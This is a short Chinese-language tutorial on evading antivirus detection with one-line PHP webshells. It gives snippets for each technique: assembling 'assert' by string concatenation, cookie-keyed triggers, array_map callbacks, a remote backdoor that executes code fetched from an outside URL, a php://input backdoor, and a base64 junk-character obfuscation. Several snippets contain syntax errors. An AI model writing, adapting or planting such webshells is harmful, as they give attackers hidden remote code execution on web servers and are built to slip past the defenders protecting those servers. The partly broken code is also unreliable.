一句话木马变种免杀

常见的免杀方式：

    字符串拼接

    多方式传参免杀

    回调函数

    远程木马

    伪协议后门

    函数特性

字符串拼接免杀：

            $str = "abcdefs";
        $s = substr($str,-1,1);
        $ev = 'a' . $s . 'sert';
        $ev($_POST['s']);

    ?>

 

多传参免杀：
   

        $COOKIE = $_COOKIE;    foreach($COOKIE as $key => $value){        if($key=='assert'){
                $key($_POST['s'];)
            }
        }
    ?>

回调函数：
    //现在应该会被安全拦截，但是大家可以自己去定义个函数，抛砖引玉

        array_map('assert',$_GET);
    ?>

 

远程后门：

   

    assert($file_get_contents('http://www.0xnull.com/1.txt'));

     //其中网址内容为需要执行的代码，当然也可以使用base64编码等方式传入

    ?>

 

伪协议后门：

    调用php伪协议进行执行代码，如果被查杀可以使用一些解密函数之类的
        assert(php://input);
    ?>

 

函数特性：

   

    $a=base64_decode('ICRf______UE9T_______VFsncydd') // $_POST['s']

    eval($a);

    P师傅之前说的base64这个解码会把不认识的字符直接跳过掉，这里的下划线就属于不认识的字符

    ?>